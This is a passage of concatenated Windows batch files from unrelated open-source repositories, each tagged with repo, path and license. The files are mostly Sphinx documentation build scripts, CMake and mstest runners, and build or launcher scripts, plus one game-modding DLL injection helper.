if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/html.
goto end
)
if "%1" == "dirhtml" (
%SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml.
goto end
)
if "%1" == "singlehtml" (
%SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/singlehtml.
goto end
)
if "%1" == "pickle" (
%SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can process the pickle files.
goto end
)
if "%1" == "json" (
%SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can process the JSON files.
goto end
)
if "%1" == "htmlhelp" (
%SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can run HTML Help Workshop with the ^
.hhp project file in %BUILDDIR%/htmlhelp.
goto end
)
if "%1" == "qthelp" (
%SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can run "qcollectiongenerator" with the ^
.qhcp project file in %BUILDDIR%/qthelp, like this:
echo.^> qcollectiongenerator %BUILDDIR%\qthelp\AlgoRun.qhcp
echo.To view the help file:
echo.^> assistant -collectionFile %BUILDDIR%\qthelp\AlgoRun.ghc
goto end
)
if "%1" == "devhelp" (
%SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished.
goto end
)
if "%1" == "epub" (
%SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The epub file is in %BUILDDIR%/epub.
goto end
)
if "%1" == "latex" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
if errorlevel 1 exit /b 1
echo.
echo.Build finished; the LaTeX files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "latexpdf" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
cd %BUILDDIR%/latex
make all-pdf
cd %~dp0
echo.
echo.Build finished; the PDF files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "latexpdfja" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
cd %BUILDDIR%/latex
make all-pdf-ja
cd %~dp0
echo.
echo.Build finished; the PDF files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "text" (
%SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The text files are in %BUILDDIR%/text.
goto end
)
if "%1" == "man" (
%SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The manual pages are in %BUILDDIR%/man.
goto end
)
if "%1" == "texinfo" (
%SPHINXBUILD% -b texinfo %ALLSPHINXOPTS% %BUILDDIR%/texinfo
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The Texinfo files are in %BUILDDIR%/texinfo.
goto end
)
if "%1" == "gettext" (
%SPHINXBUILD% -b gettext %I18NSPHINXOPTS% %BUILDDIR%/locale
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The message catalogs are in %BUILDDIR%/locale.
goto end
)
if "%1" == "changes" (
%SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes
if errorlevel 1 exit /b 1
echo.
echo.The overview file is in %BUILDDIR%/changes.
goto end
)
if "%1" == "linkcheck" (
%SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck
if errorlevel 1 exit /b 1
echo.
echo.Link check complete; look for any errors in the above output ^
or in %BUILDDIR%/linkcheck/output.txt.
goto end
)
if "%1" == "doctest" (
%SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest
if errorlevel 1 exit /b 1
echo.
echo.Testing of doctests in the sources finished, look at the ^
results in %BUILDDIR%/doctest/output.txt.
goto end
)
if "%1" == "coverage" (
%SPHINXBUILD% -b coverage %ALLSPHINXOPTS% %BUILDDIR%/coverage
if errorlevel 1 exit /b 1
echo.
echo.Testing of coverage in the sources finished, look at the ^
results in %BUILDDIR%/coverage/python.txt.
goto end
)
if "%1" == "xml" (
%SPHINXBUILD% -b xml %ALLSPHINXOPTS% %BUILDDIR%/xml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The XML files are in %BUILDDIR%/xml.
goto end
)
if "%1" == "pseudoxml" (
%SPHINXBUILD% -b pseudoxml %ALLSPHINXOPTS% %BUILDDIR%/pseudoxml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The pseudo-XML files are in %BUILDDIR%/pseudoxml.
goto end
)
:end
| algorun/algorun | docs/make.bat | bat | gpl-3.0 | 6,992 |
@echo off
call python C:\streamlink_helper\streamlink_helper.py
| plneappl/streamlink-helper | streamlink_helper/streamlink_helper.bat | bat | gpl-3.0 | 65 |
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% source
set I18NSPHINXOPTS=%SPHINXOPTS% source
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
set I18NSPHINXOPTS=-D latex_paper_size=%PAPER% %I18NSPHINXOPTS%
)
if "%1" == "" goto help
if "%1" == "help" (
:help
echo.Please use `make ^<target^>` where ^<target^> is one of
echo. html to make standalone HTML files
echo. dirhtml to make HTML files named index.html in directories
echo. singlehtml to make a single large HTML file
echo. pickle to make pickle files
echo. json to make JSON files
echo. htmlhelp to make HTML files and a HTML help project
echo. qthelp to make HTML files and a qthelp project
echo. devhelp to make HTML files and a Devhelp project
echo. epub to make an epub
echo. epub3 to make an epub3
echo. latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter
echo. text to make text files
echo. man to make manual pages
echo. texinfo to make Texinfo files
echo. gettext to make PO message catalogs
echo. changes to make an overview over all changed/added/deprecated items
echo. xml to make Docutils-native XML files
echo. pseudoxml to make pseudoxml-XML files for display purposes
echo. linkcheck to check all external links for integrity
echo. doctest to run all doctests embedded in the documentation if enabled
echo. coverage to run coverage check of the documentation if enabled
echo. dummy to check syntax errors of document sources
goto end
)
if "%1" == "clean" (
for /d %%i in (%BUILDDIR%\*) do rmdir /q /s %%i
del /q /s %BUILDDIR%\*
del /q %BUILDDIR%\..\source\mod_*.rst
goto end
)
REM Check if sphinx-build is available and fallback to Python version if any
%SPHINXBUILD% 1>NUL 2>NUL
if errorlevel 9009 goto sphinx_python
goto sphinx_ok
:sphinx_python
set SPHINXBUILD=python -m sphinx.__init__
%SPHINXBUILD% 2> nul
if errorlevel 9009 (
echo.
echo.The 'sphinx-build' command was not found. Make sure you have Sphinx
echo.installed, then set the SPHINXBUILD environment variable to point
echo.to the full path of the 'sphinx-build' executable. Alternatively you
echo.may add the Sphinx directory to PATH.
echo.
echo.If you don't have Sphinx installed, grab it from
echo.http://sphinx-doc.org/
exit /b 1
)
:sphinx_ok
if "%1" == "html" (
%SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/html.
goto end
)
if "%1" == "dirhtml" (
%SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml.
goto end
)
if "%1" == "singlehtml" (
%SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/singlehtml.
goto end
)
if "%1" == "pickle" (
%SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can process the pickle files.
goto end
)
if "%1" == "json" (
%SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can process the JSON files.
goto end
)
if "%1" == "htmlhelp" (
%SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can run HTML Help Workshop with the ^
.hhp project file in %BUILDDIR%/htmlhelp.
goto end
)
if "%1" == "qthelp" (
%SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can run "qcollectiongenerator" with the ^
.qhcp project file in %BUILDDIR%/qthelp, like this:
echo.^> qcollectiongenerator %BUILDDIR%\qthelp\KrySA.qhcp
echo.To view the help file:
echo.^> assistant -collectionFile %BUILDDIR%\qthelp\KrySA.ghc
goto end
)
if "%1" == "devhelp" (
%SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished.
goto end
)
if "%1" == "epub" (
%SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The epub file is in %BUILDDIR%/epub.
goto end
)
if "%1" == "epub3" (
%SPHINXBUILD% -b epub3 %ALLSPHINXOPTS% %BUILDDIR%/epub3
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The epub3 file is in %BUILDDIR%/epub3.
goto end
)
if "%1" == "latex" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
if errorlevel 1 exit /b 1
echo.
echo.Build finished; the LaTeX files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "latexpdf" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
cd %BUILDDIR%/latex
make all-pdf
cd %~dp0
echo.
echo.Build finished; the PDF files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "latexpdfja" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
cd %BUILDDIR%/latex
make all-pdf-ja
cd %~dp0
echo.
echo.Build finished; the PDF files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "text" (
%SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The text files are in %BUILDDIR%/text.
goto end
)
if "%1" == "man" (
%SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The manual pages are in %BUILDDIR%/man.
goto end
)
if "%1" == "texinfo" (
%SPHINXBUILD% -b texinfo %ALLSPHINXOPTS% %BUILDDIR%/texinfo
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The Texinfo files are in %BUILDDIR%/texinfo.
goto end
)
if "%1" == "gettext" (
%SPHINXBUILD% -b gettext %I18NSPHINXOPTS% %BUILDDIR%/locale
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The message catalogs are in %BUILDDIR%/locale.
goto end
)
if "%1" == "changes" (
%SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes
if errorlevel 1 exit /b 1
echo.
echo.The overview file is in %BUILDDIR%/changes.
goto end
)
if "%1" == "linkcheck" (
%SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck
if errorlevel 1 exit /b 1
echo.
echo.Link check complete; look for any errors in the above output ^
or in %BUILDDIR%/linkcheck/output.txt.
goto end
)
if "%1" == "doctest" (
%SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest
if errorlevel 1 exit /b 1
echo.
echo.Testing of doctests in the sources finished, look at the ^
results in %BUILDDIR%/doctest/output.txt.
goto end
)
if "%1" == "coverage" (
%SPHINXBUILD% -b coverage %ALLSPHINXOPTS% %BUILDDIR%/coverage
if errorlevel 1 exit /b 1
echo.
echo.Testing of coverage in the sources finished, look at the ^
results in %BUILDDIR%/coverage/python.txt.
goto end
)
if "%1" == "xml" (
%SPHINXBUILD% -b xml %ALLSPHINXOPTS% %BUILDDIR%/xml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The XML files are in %BUILDDIR%/xml.
goto end
)
if "%1" == "pseudoxml" (
%SPHINXBUILD% -b pseudoxml %ALLSPHINXOPTS% %BUILDDIR%/pseudoxml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The pseudo-XML files are in %BUILDDIR%/pseudoxml.
goto end
)
if "%1" == "dummy" (
%SPHINXBUILD% -b dummy %ALLSPHINXOPTS% %BUILDDIR%/dummy
if errorlevel 1 exit /b 1
echo.
echo.Build finished. Dummy builder generates no files.
goto end
)
:end
| KeyWeeUsr/KrySA | docs/make.bat | bat | gpl-3.0 | 7,500 |
set PATH=%PATH%;%~dp0.. | ldrumm/libbeemo | tests/activate.bat | bat | lgpl-2.1 | 23 |
@echo off
set qtpath=Qt
set depfiledir=depfiles
set binary=Files Drag and Drop.exe
echo Checking PATH ...
echo %PATH% | findstr /C:"%qtpath%" 1>nul
if errorlevel 1 (
echo Error, Qt is not in your path
goto :end
)
xcopy "%binary%" "%depfiledir%" /y
cd "%depfiledir%"
windeployqt.exe --no-translations "%binary%"
del "%binary%"
:end
pause
Exit 0 | filesdnd/filesdnd-qt | installer/windows/files/deploy.bat | bat | lgpl-2.1 | 352 |
@set JAVA_32BIT="c:\program files (x86)\java\jre7\bin\java.exe"
@if not exist %JAVA_32BIT% (
@echo INFO: %JAVA_32BIT% not found, trying "java -d32"
@set JAVA_32BIT=java -d32
)
@if not exist "%USERPROFILE%\.fmj.registry.xml" (
@echo INFO: .fmj.registry.xml not found, creating a new one
:: tworzenie rejestru urzadzen FMJ
%JAVA_32BIT% ^
-Djava.library.path="native/win32-x86" ^
-Dfile.encoding=UTF-8 ^
-classpath "labyrinth.jar;lib/fmj.jar;lib/jdom.jar;lib/lti-civil-no_s_w_t.jar;lib/jl1.0.jar;lib/tritonus_share.jar;lib/mp3spi1.9.4.jar;lib/jorbis-0.0.15.jar;lib/jogg-0.0.7.jar;lib/vorbisspi1.0.2.jar;lib/jspeex.jar;lib/jna.jar;lib/ffmpeg-java.jar;lib/theora-java.jar;lib/jheora-patch.jar" ^
FMJAutoConfig
)
:: wlasciwe uruchamianie
%JAVA_32BIT% ^
-Djava.library.path="native/win32-x86" ^
-Dfile.encoding=UTF-8 ^
-jar .\labyrinth.jar ^
-debug
| dextero/labyrinth | out/artifacts/labyrinth_jar/launcher.bat | bat | lgpl-3.0 | 942 |
CALL CMakeCommon.bat
ECHO *** Set MVC14 specifics and run CMake ***
SET MAINCMAKE=%SRCROOTDIR%\projects\CMake\targets\GUCEF_exe_ProcessMetrics
SET VS19_OUTPUTDIR="%OUTPUTDIR%\VS2019_ProcessMetrics"
CMake.exe -DBUILD_SHARED_LIBS=ON -G"Visual Studio 16 2019" -A Win32 -H"%MAINCMAKE%" -B%VS19_OUTPUTDIR%
PAUSE | LiberatorUSA/GUCEF | projects/CMake/RunCMake_Shared_VS2019_Win32_ProcessMetrics.bat | bat | apache-2.0 | 309 |
@ECHO off
ECHO ##############################################
ECHO ### Generating code from the WSDL document ###
ECHO ##############################################
SvcUtil.exe /language:C# https://soapnext.contactlab.it/soap/services?wsdl /namespace:domain.ws.api.contactlab.com,"ContactLabAPIClient.DomainSharedTypes" /namespace:campaign.domain.ws.api.contactlab.com,"ContactLabAPIClient.DomainCampaignTypes" /namespace:http://ws.api.contactlab.com/,"ContactLabAPIClient.ClabService" /out:src\ApiClient.cs
ECHO ########################
ECHO ### Applying license ###
ECHO ########################
copy .\src\ApiClient.cs .\src\ApiClient.cs.tmp
type .\resources\license_header.txt > .\src\ApiClient.cs
type .\src\ApiClient.cs.tmp >> .\src\ApiClient.cs
del .\src\ApiClient.cs.tmp
ECHO #################
ECHO ### Compiling ###
ECHO #################
\Windows\Microsoft.NET\Framework64\v4.0.30319\csc /t:library /out:lib\ApiClient.dll .\src\ApiClient.cs
| contactlab/soap-api-dotnet-client-next | build.bat | bat | apache-2.0 | 958 |
@echo 确定执行js css的发布任务?执行完毕,窗口自动关闭。
@pause
gulp deploy | yufeng629/dubbox-demo | shop-web/src/main/webapp/static/deploy.bat | bat | apache-2.0 | 97 |
copy .\lib\src\core\base.js + .\lib\src\plugin\nvLayout.js + .\lib\src\plugin\nvCalendar.js + .\lib\src\plugin\nvYearMonthSelect.js + .\lib\src\plugin\nvGridSelector.js nvui.js | Html5Lexloo/nvui | copyjs.bat | bat | apache-2.0 | 177 |
CALL CMakeCommon.bat
ECHO *** Set VS2019 specifics and run CMake ***
SET MAINCMAKE=%SRCROOTDIR%\projects\CMake\targets\GUCEF_tag_platform
SET VS19_OUTPUTDIR="%OUTPUTDIR%\VS2019_x64_Platform"
CMake.exe -DBUILD_SHARED_LIBS=ON -G"Visual Studio 16 2019" -A x64 -H"%MAINCMAKE%" -B%VS19_OUTPUTDIR%
PAUSE | LiberatorUSA/GUCEF | projects/CMake/RunCMake_Shared_VS2019_Win64_Platform.bat | bat | apache-2.0 | 300 |
@ECHO OFF
REM Command file for Sphinx documentation
if "%SPHINXBUILD%" == "" (
set SPHINXBUILD=sphinx-build
)
set BUILDDIR=_build
set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% .
set I18NSPHINXOPTS=%SPHINXOPTS% .
if NOT "%PAPER%" == "" (
set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS%
set I18NSPHINXOPTS=-D latex_paper_size=%PAPER% %I18NSPHINXOPTS%
)
if "%1" == "" goto help
if "%1" == "help" (
:help
echo.Please use `make ^<target^>` where ^<target^> is one of
echo. html to make standalone HTML files
echo. dirhtml to make HTML files named index.html in directories
echo. singlehtml to make a single large HTML file
echo. pickle to make pickle files
echo. json to make JSON files
echo. htmlhelp to make HTML files and a HTML help project
echo. qthelp to make HTML files and a qthelp project
echo. devhelp to make HTML files and a Devhelp project
echo. epub to make an epub
echo. latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter
echo. text to make text files
echo. man to make manual pages
echo. texinfo to make Texinfo files
echo. gettext to make PO message catalogs
echo. changes to make an overview over all changed/added/deprecated items
echo. linkcheck to check all external links for integrity
echo. doctest to run all doctests embedded in the documentation if enabled
goto end
)
if "%1" == "clean" (
for /d %%i in (%BUILDDIR%\*) do rmdir /q /s %%i
del /q /s %BUILDDIR%\*
goto end
)
if "%1" == "html" (
%SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/html.
goto end
)
if "%1" == "dirhtml" (
%SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml.
goto end
)
if "%1" == "singlehtml" (
%SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The HTML pages are in %BUILDDIR%/singlehtml.
goto end
)
if "%1" == "pickle" (
%SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can process the pickle files.
goto end
)
if "%1" == "json" (
%SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can process the JSON files.
goto end
)
if "%1" == "htmlhelp" (
%SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can run HTML Help Workshop with the ^
.hhp project file in %BUILDDIR%/htmlhelp.
goto end
)
if "%1" == "qthelp" (
%SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished; now you can run "qcollectiongenerator" with the ^
.qhcp project file in %BUILDDIR%/qthelp, like this:
echo.^> qcollectiongenerator %BUILDDIR%\qthelp\Pyrakoon.qhcp
echo.To view the help file:
echo.^> assistant -collectionFile %BUILDDIR%\qthelp\Pyrakoon.ghc
goto end
)
if "%1" == "devhelp" (
%SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp
if errorlevel 1 exit /b 1
echo.
echo.Build finished.
goto end
)
if "%1" == "epub" (
%SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The epub file is in %BUILDDIR%/epub.
goto end
)
if "%1" == "latex" (
%SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex
if errorlevel 1 exit /b 1
echo.
echo.Build finished; the LaTeX files are in %BUILDDIR%/latex.
goto end
)
if "%1" == "text" (
%SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The text files are in %BUILDDIR%/text.
goto end
)
if "%1" == "man" (
%SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The manual pages are in %BUILDDIR%/man.
goto end
)
if "%1" == "texinfo" (
%SPHINXBUILD% -b texinfo %ALLSPHINXOPTS% %BUILDDIR%/texinfo
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The Texinfo files are in %BUILDDIR%/texinfo.
goto end
)
if "%1" == "gettext" (
%SPHINXBUILD% -b gettext %I18NSPHINXOPTS% %BUILDDIR%/locale
if errorlevel 1 exit /b 1
echo.
echo.Build finished. The message catalogs are in %BUILDDIR%/locale.
goto end
)
if "%1" == "changes" (
%SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes
if errorlevel 1 exit /b 1
echo.
echo.The overview file is in %BUILDDIR%/changes.
goto end
)
if "%1" == "linkcheck" (
%SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck
if errorlevel 1 exit /b 1
echo.
echo.Link check complete; look for any errors in the above output ^
or in %BUILDDIR%/linkcheck/output.txt.
goto end
)
if "%1" == "doctest" (
%SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest
if errorlevel 1 exit /b 1
echo.
echo.Testing of doctests in the sources finished, look at the ^
results in %BUILDDIR%/doctest/output.txt.
goto end
)
:end
| Incubaid/pyrakoon | doc/make.bat | bat | apache-2.0 | 5,100 |
@echo off
setlocal
REM Set intermediate env vars because the %VAR:x=y% notation below
REM (which replaces the string x with the string y in VAR)
REM doesn't handle undefined environment variables. This way
REM we're always dealing with defined variables in those tests.
set CHK_HOME=_%AWS_SNS_HOME%
if "%CHK_HOME:"=%" == "_" goto HOME_MISSING
"%AWS_SNS_HOME:"=%\bin\sns-cmd.cmd" add-permission %*
goto DONE
:HOME_MISSING
echo AWS_SNS_HOME is not set
exit /b 1
:DONE
| bizo/aws-tools | sns/SimpleNotificationServiceCli-1.0.3.0/bin/sns-add-permission.cmd | bat | apache-2.0 | 471 |
rmdir /s /q target\bindings
md target\bindings
move target\%1-%2\app\%3\BINDINGS target\bindings
move target\%1-%2\app\%3\SERVICE_BINDINGS target\bindings
move target\%1-%2\app target | futureplatforms/Kirin | src/common/kirin-gwt/scripts/copy_bindings.bat | bat | apache-2.0 | 187 |
@ECHO OFF
mongo --quiet --eval "db.loadServerScripts(); createUser('%1', '%2');" localhost/mvnrepo
| daspilker/mvn-repo | createUser.bat | bat | apache-2.0 | 100 |
:: this script starts a las2peer node providing the example service of this project
:: pls execute it from the bin folder of your deployment by double-clicking on it
%~d0
cd %~p0
cd ..
set BASE=%CD%
set CLASSPATH="%BASE%/lib/*;"
java -cp %CLASSPATH% i5.las2peer.tools.L2pNodeLauncher -w -p 9011 uploadStartupDirectory('etc/startup') startService('i5.las2peer.services.swevaRepository.SwevaRepository','TemplateServicePass') startWebConnector interactive
pause
| rwth-acis/SWeVA-Repository-Service | bin/start_network.bat | bat | bsd-3-clause | 462 |
inject.exe --run "E:\Games\SteamLibrary\steamapps\common\Deus Ex Human Revolution Director's Cut\DXHRDC.exe" --inject --steam-app-id 238010 --export Load --add-path --path-resolution --module cerberus.dll | geota/hadesmem | scripts/x86/dehrdc.bat | bat | mit | 204 |
@echo off
pushd %~dp0
"%VS120COMNTOOLS%..\IDE\mstest" /test:Microsoft.Protocols.TestSuites.MS_WOPI.MS_WOPI_S01_Cell.TestCase_S01_TC19_UploadContents_CoalesceHResult /testcontainer:..\..\MS-WOPI\TestSuite\bin\Debug\MS-WOPI_TestSuite.dll /runconfig:..\..\MS-WOPI\MS-WOPI.testsettings /unique
pause | XinwLi/Interop-TestSuites-1 | FileSyncandWOPI/Source/Scripts/MS-WOPI/RunMSWOPI_S01_TC19.cmd | bat | mit | 295 |
@echo off
pushd %~dp0
"%VS120COMNTOOLS%..\IDE\mstest" /test:Microsoft.Protocols.TestSuites.MS_OXWSTASK.S04_MoveTaskItem.MSOXWSTASK_S04_TC01_VerifyMoveTaskItem /testcontainer:..\..\MS-OXWSTASK\TestSuite\bin\Debug\MS-OXWSTASK_TestSuite.dll /runconfig:..\..\MS-OXWSTASK\MS-OXWSTASK.testsettings /unique
pause | XinwLi/Interop-TestSuites-1 | ExchangeWebServices/Source/Scripts/MS-OXWSTASK/RunMSOXWSTASK_S04_TC01_VerifyMoveTaskItem.cmd | bat | mit | 305 |
@echo off
pushd %~dp0
"%VS120COMNTOOLS%..\IDE\mstest" /test:Microsoft.Protocols.TestSuites.MS_CPSWS.S01_RetrieveTypes.MSCPSWS_S01_TC08_EntityTypes_AllValidProviderNames /testcontainer:..\..\MS-CPSWS\TestSuite\bin\Debug\MS-CPSWS_TestSuite.dll /runconfig:..\..\MS-CPSWS\MS-CPSWS.testsettings /unique
pause | XinwLi/Interop-TestSuites-1 | SharePoint/Source/Scripts/MS-CPSWS/RunMSCPSWS_S01_TC08_EntityTypes_AllValidProviderNames.cmd | bat | mit | 303 |
@echo lang fix ru >lang.inc
@fasm rsquare.asm rsquare
@erase lang.inc
kpack rsquare
@pause | devlato/kolibrios-llvm | programs/games/rsquare/trunk/build_ru.bat | bat | mit | 90 |
@echo deploy | Qulix/Esd.Build | Esd.Build/Stages/Stage/deploy.cmd | bat | gpl-2.0 | 12 |
python "C:\Program Files (x86)\cdsp\marvin\marvin.py" "%CD%" "%CD%\marvin" | SciencesPoDRIS/Marvin | exec/marvin.bat | bat | gpl-3.0 | 74 |
@echo off
set service_name=%1%
net start | find %service_name%
if ERRORLEVEL 1 net stop %service_name%
net start %service_name%
| pmanwatkar/puppetModules | actions/files/ProcessHandlingWindows/check_service_status.bat | bat | gpl-3.0 | 128 |
@rem Licensed to the Apache Software Foundation (ASF) under one
@rem or more contributor license agreements. See the NOTICE file
@rem distributed with this work for additional information
@rem regarding copyright ownership. The ASF licenses this file
@rem to you under the Apache License, Version 2.0 (the
@rem "License"); you may not use this file except in compliance
@rem with the License. You may obtain a copy of the License at
@rem
@rem http://www.apache.org/licenses/LICENSE-2.0
@rem
@rem Unless required by applicable law or agreed to in writing,
@rem software distributed under the License is distributed on an
@rem "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
@rem KIND, either express or implied. See the License for the
@rem specific language governing permissions and limitations
@rem under the License.
@echo on
conda update --yes --quiet conda
conda create -n arrow -q -y python=%PYTHON% ^
six pytest setuptools numpy=%NUMPY% pandas
conda install -n arrow -q -y -c conda-forge ^
git flatbuffers rapidjson ^
cmake ^
boost-cpp thrift-cpp ^
gflags snappy zlib brotli zstd lz4-c double-conversion
call activate arrow
pushd %ARROW_SRC%
@rem fix up symlinks
git config core.symlinks true
git reset --hard || exit /B
git checkout "%PYARROW_REF%" || exit /B
popd
set ARROW_HOME=%CONDA_PREFIX%\Library
set PARQUET_HOME=%CONDA_PREFIX%\Library
set ARROW_BUILD_TOOLCHAIN=%CONDA_PREFIX%\Library
echo %ARROW_HOME%
@rem Build and test Arrow C++ libraries
mkdir %ARROW_SRC%\cpp\build
pushd %ARROW_SRC%\cpp\build
cmake -G "%GENERATOR%" ^
-DCMAKE_INSTALL_PREFIX=%ARROW_HOME% ^
-DARROW_BOOST_USE_SHARED=OFF ^
-DARROW_BUILD_TESTS=OFF ^
-DCMAKE_BUILD_TYPE=Release ^
-DARROW_CXXFLAGS="/MP" ^
-DARROW_PYTHON=ON ^
-DARROW_PARQUET=ON ^
.. || exit /B
cmake --build . --target INSTALL --config Release || exit /B
@rem Needed so python-test.exe works
set PYTHONPATH=%CONDA_PREFIX%\Lib;%CONDA_PREFIX%\Lib\site-packages;%CONDA_PREFIX%\python35.zip;%CONDA_PREFIX%\DLLs;%CONDA_PREFIX%
ctest -VV || exit /B
popd
@rem Build and import pyarrow
set PYTHONPATH=
pushd %ARROW_SRC%\python
set PYARROW_BUILD_TYPE=Release
set SETUPTOOLS_SCM_PRETEND_VERSION=%PYARROW_VERSION%
@rem Newer Cython versions are not available on conda-forge
